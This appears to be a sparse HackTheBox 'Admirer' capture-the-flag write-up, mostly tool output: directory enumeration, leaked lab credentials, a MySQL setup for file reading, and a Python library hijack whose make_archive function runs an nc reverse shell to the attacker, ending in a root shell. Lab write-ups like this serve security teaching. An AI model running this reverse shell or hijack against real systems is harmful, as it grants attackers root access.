HackTheBox — Admirer

Summary

Enumeration

Nmap

User-agent: *
# This folder contains personal contacts and creds, so no one -not even robots- should see it — waldo
Disallow: /admin-dir
root@strike:~# gobuster dir -u http://10.10.10.187/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.187/admin-dir/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/06/05 23:18:48 Starting gobuster
===============================================================
/contact.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2020/06/05 23:22:42 Finished
===============================================================
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!
<?php
$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

// Create connection
$conn = new mysqli($servername, $username, $password);

// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";


// TODO: Finish implementing this or find a better open source alternative
?>

Exploitation

create database exploit;
use exploit;
create table dmp(content varchar(5000));

Privilege Escalation

import os

def make_archive(a, b, c):
    os.system('nc 10.10.x.xx 1337 -e "/bin/sh"')
root@strike:~# nc -lnvp 1337
listening on [any] 1337 ...
root@strike:~# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.x.xx] from (UNKNOWN) [10.10.10.187] 52226
id
uid=0(root) gid=0(root) groups=0(root)

THX for ur time!
